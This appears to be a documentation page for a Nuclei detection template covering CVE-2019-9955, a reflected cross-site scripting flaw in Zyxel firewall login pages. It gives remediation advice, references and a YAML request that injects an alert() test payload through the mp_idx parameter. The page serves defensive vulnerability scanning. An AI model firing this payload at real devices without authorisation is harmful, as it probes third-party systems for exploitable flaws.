Skip to content
Nuclei Templates

Zyxel - Cross-Site Scripting

ID: CVE-2019-9955

Severity: medium

Author: pdteam

Tags: cve,cve2019,zyxel,packetstorm,seclists,edb,xss

Description

Section titled “Description”

Zyxel ATP200, ATP500, ATP800, USG20-VPN, USG20W-VPN, USG40, USG40W, USG60, USG60W, USG110, USG210, USG310, USG1100, USG1900, USG2200-VPN, ZyWALL 110, ZyWALL 310, and ZyWALL 1100 devices contain a reflected cross-site scripting vulnerability on the security firewall login page via the mp_idx parameter.

YAML Source

Section titled “YAML Source”
id: CVE-2019-9955


info:
  name: Zyxel - Cross-Site Scripting
  author: pdteam
  severity: medium
  description: Zyxel ATP200, ATP500, ATP800, USG20-VPN, USG20W-VPN, USG40, USG40W, USG60, USG60W, USG110, USG210, USG310, USG1100, USG1900, USG2200-VPN, ZyWALL 110, ZyWALL 310, and ZyWALL 1100 devices contain a reflected cross-site scripting vulnerability on the security firewall login page via the mp_idx parameter.
  remediation: |
    Apply the latest security patches provided by Zyxel to fix the Cross-Site Scripting vulnerability (CVE-2019-9955).
  reference:
    - http://packetstormsecurity.com/files/152525/Zyxel-ZyWall-Cross-Site-Scripting.html
    - https://www.exploit-db.com/exploits/46706/
    - https://www.securitymetrics.com/blog/Zyxel-Devices-Vulnerable-Cross-Site-Scripting-Login-page
    - https://www.zyxel.com/support/reflected-cross-site-scripting-vulnerability-of-firewalls.shtml
    - https://nvd.nist.gov/vuln/detail/CVE-2019-9955
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2019-9955
    cwe-id: CWE-79
    epss-score: 0.05816
    epss-percentile: 0.93234
    cpe: cpe:2.3:o:zyxel:atp200_firmware:4.31:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: zyxel
    product: atp200_firmware
  tags: cve,cve2019,zyxel,packetstorm,seclists,edb,xss


http:
  - method: GET
    path:
      - "{{BaseURL}}/?mp_idx=%22;alert(%271%27);//"


    matchers:
      - type: word
        part: body
        words:
          - "\";alert('1');//"
          - "<title>Welcome</title>"
        condition: and
# digest: 4b0a00483046022100e9126667bb7c1a85a381c54981050d2574bfa25663ade5bba4752cfdd95b23a3022100c1eb53231f0d269bbc3af0d5d55afa125f9b5636fe75e274db2e8afddfc82023:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2019/CVE-2019-9955.yaml"

View on Github